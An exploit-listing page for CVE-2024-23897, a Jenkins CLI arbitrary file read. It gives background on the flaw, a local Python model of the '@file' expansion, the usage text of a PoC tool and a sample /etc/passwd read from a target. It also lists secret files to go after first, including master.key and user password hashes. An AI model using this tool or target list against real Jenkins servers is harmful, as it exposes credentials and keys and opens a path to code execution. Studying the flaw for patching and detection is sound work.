## https://sploitus.com/exploit?id=CAFCCD1B-2769-5DD2-83A8-6487EC9F3A60
# CVE-2024-23897: Jenkins Arbitrary File Read

## Description

This Proof-of-Concept (POC) exploits CVE-2024-23897 to read files from the controller file system of a vulnerable Jenkins server: weekly releases up to and including 2.441 and LTS releases up to and including 2.426.2 (fixed in 2.442 and LTS 2.426.3).

Jenkins 2.441 and earlier, LTS 2.426.2 and earlier does not disable a feature of its CLI command parser (args4j) that replaces an `@` character followed by a file path in an argument with the file's contents, allowing unauthenticated attackers to read arbitrary files on the Jenkins controller file system. The expansion runs on the controller, with the permissions of the Jenkins process, while the arguments are being parsed, so it happens before the command itself gets to check authorization; reaching the CLI endpoint over HTTP is all that is required. Where upgrading is not immediately possible, the documented workaround is to disable access to the CLI.

Severity: 7.5 HIGH (NVD). Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N. Jenkins' own advisory rates the issue Critical, since the files it exposes include the secrets needed to chain it into remote code execution.

Two limitations matter in practice. Without Overall/Read permission (the unauthenticated case) only the first line, or the first few lines, of a file come back, because the content is reflected only through the error message of a command that rejects the expanded arguments, and how many lines that exposes depends on the command used; with Overall/Read, entire files can be read. Binary files cannot be read in full: the parser treats the file as text in the controller's default character encoding, so bytes that do not decode cleanly are lost along the way. Plaintext files that are worth reading first (paths assume the default `JENKINS_HOME` of the official Docker image, `/var/jenkins_home`):

- `/proc/self/environ` environment of the Jenkins process, including `JENKINS_HOME`; entries are NUL-separated, so a line-based reader sees the whole block as a single line
- `/proc/self/cmdline` command line of the Jenkins process, also NUL-separated
- `/etc/hosts` static hostname-to-address mappings
- `/etc/passwd` local user accounts
- `/var/jenkins_home/users/users.xml` maps user IDs to the directories that hold their records
- `/var/jenkins_home/users/<user_directory>/config.xml` user record, including the BCrypt password hash when Jenkins' own user database is in use
- `/var/jenkins_home/secrets/master.key` key that protects the other secrets under `secrets/`; hex-encoded on a single line
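
The mechanism is a property of the argument parser, not of any one CLI command. The Python below is an added example (not this PoC's code, and not Jenkins' or args4j's): it models args4j's at-syntax expansion beside the same parse with the feature switched off, which is what the fixed Jenkins releases do (they build the parser with at-syntax disabled and only re-enable the legacy behaviour behind the `hudson.cli.CLICommand.allowAtSyntax` system property). The toy `help` handler, its error strings, the command list and the two-line sample file are assumptions made for the illustration.

```python
"""Model of the CVE-2024-23897 root cause: args4j-style '@file' argument expansion.

Added example; not code from this PoC, from Jenkins or from args4j. The expansion
(each non-empty line of the named file becomes one argument) is a simplified model of
args4j's at-syntax, and the toy `help` command with its error strings is an assumption
used to show how a line of a server-side file ends up in the reply to the caller.
"""
import os
import tempfile
from typing import List, Tuple


def expand_at_files(args: List[str], at_syntax: bool = True) -> List[str]:
    """With at-syntax on, replace every '@path' argument by the lines of that file.

    The path comes straight from the caller and is opened with the server process's
    privileges; nothing checks it. With at_syntax=False the argument is passed through
    untouched, which is what the Jenkins fix (disabling the feature) amounts to.
    """
    if not at_syntax:
        return list(args)
    expanded: List[str] = []
    for arg in args:
        if arg.startswith("@"):
            with open(arg[1:], encoding="utf-8", errors="replace") as fh:
                expanded.extend(line.rstrip("\n") for line in fh if line.strip())
        else:
            expanded.append(arg)
    return expanded


KNOWN_COMMANDS = {"help", "who-am-i", "version"}  # toy subset, an assumption


def run_help(raw_args: List[str], at_syntax: bool = True) -> str:
    """Toy 'help [command]' handler that takes one positional argument.

    Like many CLI parsers it quotes the offending argument in its error text. That
    quote is the read primitive: in Jenkins the parse error is produced before the
    command checks permissions, and which line is reflected depends on which of the
    expanded arguments the parser rejects first.
    """
    args = expand_at_files(raw_args, at_syntax)
    if not args:
        return "usage: help [command]"
    if len(args) > 1:
        return f"ERROR: Too many arguments: {args[1]}"
    if args[0] not in KNOWN_COMMANDS:
        return f"ERROR: No such command {args[0]}"
    return f"{args[0]}: (description)"


def demo() -> Tuple[str, str]:
    """Write a constructed two-line file and run 'help @<path>' with and without at-syntax."""
    with tempfile.NamedTemporaryFile("w", suffix=".txt", delete=False) as fh:
        fh.write("root:x:0:0:root:/root:/bin/bash\n")
        fh.write("daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin\n")
        path = fh.name
    try:
        leaked = run_help([f"@{path}"], at_syntax=True)   # a file line is echoed back
        safe = run_help([f"@{path}"], at_syntax=False)    # only the literal '@/path' is echoed
    finally:
        os.unlink(path)
    return leaked, safe


if __name__ == "__main__":
    for label, reply in zip(("at-syntax on ", "at-syntax off"), demo()):
        print(f"{label}: {reply}")
```

Note that the vulnerable run reflects the second line of the file, not the first: the toy parser accepts one positional argument and complains about the surplus. That is why the advisory's "first few lines" wording is command-dependent, and why, when hunting for a secret that sits on a known line, the choice of command matters as much as the path.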

## Usage

```text
usage: jenkins_fileread.py [-h] -u URL [-f FILE] [-t TIMEOUT] [-s] [-o] [-p PROXY] [-v]

POC for CVE-2024-23897 (Jenkins file read)

options:
  -h, --help            show this help message and exit
  -u URL, --url URL     Jenkins URL
  -f FILE, --file FILE  File path to read
  -t TIMEOUT, --timeout TIMEOUT
                        Request timeout
  -s, --save            Save file contents
  -o, --overwrite       Overwrite existing files
  -p PROXY, --proxy PROXY
                        HTTP(s) proxy to use when sending requests (i.e. -p http://127.0.0.1:8080)
  -v, --verbose         Verbosity enabled - additional output flag
```

## Example

```sh
$ jenkins_fileread.py -u http://<target-ip>:8080
Welcome to the Jenkins file-read shell. Type help or ? to list commands.

file> /etc/passwd
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
root:x:0:0:root:/root:/bin/bash
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
_apt:x:42:65534::/nonexistent:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
jenkins:x:1000:1000::/var/jenkins_home:/bin/bash
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
```

## References

- [NIST CVE-2024-23897](https://nvd.nist.gov/vuln/detail/CVE-2024-23897)
- [Jenkins Security Advisory 2024-01-24](https://www.jenkins.io/security/advisory/2024-01-24/)
- [Excessive Expansion: Uncovering Critical Security Vulnerabilities in Jenkins](https://www.sonarsource.com/blog/excessive-expansion-uncovering-critical-security-vulnerabilities-in-jenkins/)
- [Breaking Down CVE-2024-23897: PoC Code Surfaces Just After Jenkins Advisory](https://securityonline.info/breaking-down-cve-2024-23897-poc-code-surfaces-just-after-jenkins-advisory/)